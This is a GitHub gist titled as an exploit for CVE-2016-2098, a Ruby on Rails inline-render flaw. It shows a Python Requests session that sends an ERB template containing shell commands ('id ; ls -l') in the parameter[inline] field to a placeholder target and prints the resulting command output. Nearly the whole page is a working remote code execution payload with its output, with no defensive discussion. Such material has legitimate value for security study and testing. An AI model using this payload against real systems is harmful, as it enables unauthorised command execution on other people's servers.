Skip to content

Instantly share code, notes, and snippets.

@FrancoisCapon

FrancoisCapon/CVE-2016-2098.md

Created March 4, 2023 13:04
Show Gist options
  • Save FrancoisCapon/7d81181d5bac8e5e4a1120c700ed3e35 to your computer and use it in GitHub Desktop.
Save FrancoisCapon/7d81181d5bac8e5e4a1120c700ed3e35 to your computer and use it in GitHub Desktop.
Download ZIP
CVE-2016-2098 exploit with Requests using Python Interpreter
Raw
CVE-2016-2098.md

CVE-2016-2098 exploit with Requests using Python Interpreter

CVE

Ruby

Python > Requests

Exploit example

$ python3
...
>>> import requests
>>> url = 'http://the.target.tld'
>>> template = 'oscmd<%= `id ; ls -l`  %>oscmd'
>>> httprequest = requests.get(url, params = {'parameter[inline]' : template})
>>> httprequest.status_code ; print(httprequest.text.split("oscmd")[1])
200
uid=1000(webrick) gid=1000(webrick) groups=1000(webrick)
total 84
-rw-r--r-- 1 webrick webrick  765 Apr 15  2021 Gemfile
-rw-r--r-- 1 webrick root    2455 Apr 15  2021 Gemfile.lock
-rw-r--r-- 1 webrick webrick 9208 Apr 15  2021 README.rdoc
-rw-r--r-- 1 webrick webrick  270 Apr 15  2021 Rakefile
drwxr-xr-x 1 webrick webrick 4096 Apr 15  2021 app
drwxr-xr-x 1 webrick webrick 4096 Apr 15  2021 config
-rw-r--r-- 1 webrick webrick  155 Apr 15  2021 config.ru
drwxr-xr-x 1 webrick webrick 4096 Apr 15  2021 db
...
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment